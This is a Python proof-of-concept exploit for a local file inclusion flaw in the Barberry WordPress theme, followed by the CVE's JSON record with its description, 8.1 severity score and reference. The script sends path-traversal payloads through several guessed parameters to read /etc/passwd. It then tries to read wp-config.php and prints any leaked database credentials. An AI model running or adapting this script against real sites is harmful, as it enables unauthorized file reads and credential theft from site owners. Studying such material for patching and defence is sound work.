CVE-2025-68908

# CVE-2025-68908 PoC - Barberry Theme LFI # Usage: python poc.py target_url import sys import requests from urllib.parse import urljoin def exploit_lfi(target_url): """Exploit Local File Inclusion in Barberry theme""" # Common vulnerable parameter patterns params_to_try = [ {'file': '../../../../../../etc/passwd'}, {'template': '../../../../../../etc/passwd'}, {'page': '../../../../../../etc/passwd'}, {'theme': '../../../../../../etc/passwd'}, {'load': '../../../../../../etc/passwd'} ] print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-68908\n") for param in params_to_try: try: response = requests.get(target_url, params=param, timeout=10) # Check if /etc/passwd content is returned if 'root:' in response.text and 'bin/bash' in response.text: print(f"[+] VULNERABLE! Parameter: {list(param.keys())[0]}") print(f"[+] File content leaked:") print(response.text[:500]) return True except requests.RequestException as e: print(f"[-] Error: {e}") # Try to read wp-config.php print("\n[*] Trying to read wp-config.php...") wp_config_params = [ {'file': '../../../../../../var/www/html/wp-config.php'}, {'file': '../../../../../../html/wp-config.php'}, {'file': '../../../../../../public_html/wp-config.php'} ] for param in wp_config_params: try: response = requests.get(target_url, params=param, timeout=10) if 'DB_NAME' in response.text and 'DB_USER' in response.text: print(f"[+] Database credentials leaked!") print(response.text[:800]) return True except: pass print("[-] No obvious LFI detected") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-68908.py <target_url>") sys.exit(1) exploit_lfi(sys.argv[1])

{"cve": {"id": "CVE-2025-68908", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:14.723", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in temash Barberry barberry allows PHP Local File Inclusion.This issue affects Barberry: from n/a through <= 2.9.9.87."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en un programa PHP ('Inclusión Remota de Ficheros PHP') vulnerabilidad en temash Barberry barberry permite Inclusión Local de Ficheros PHP. Este problema afecta a Barberry: desde n/a hasta &lt;= 2.9.9.87."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/barberry/vulnerability/wordpress-barberry-theme-2-9-9-87-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}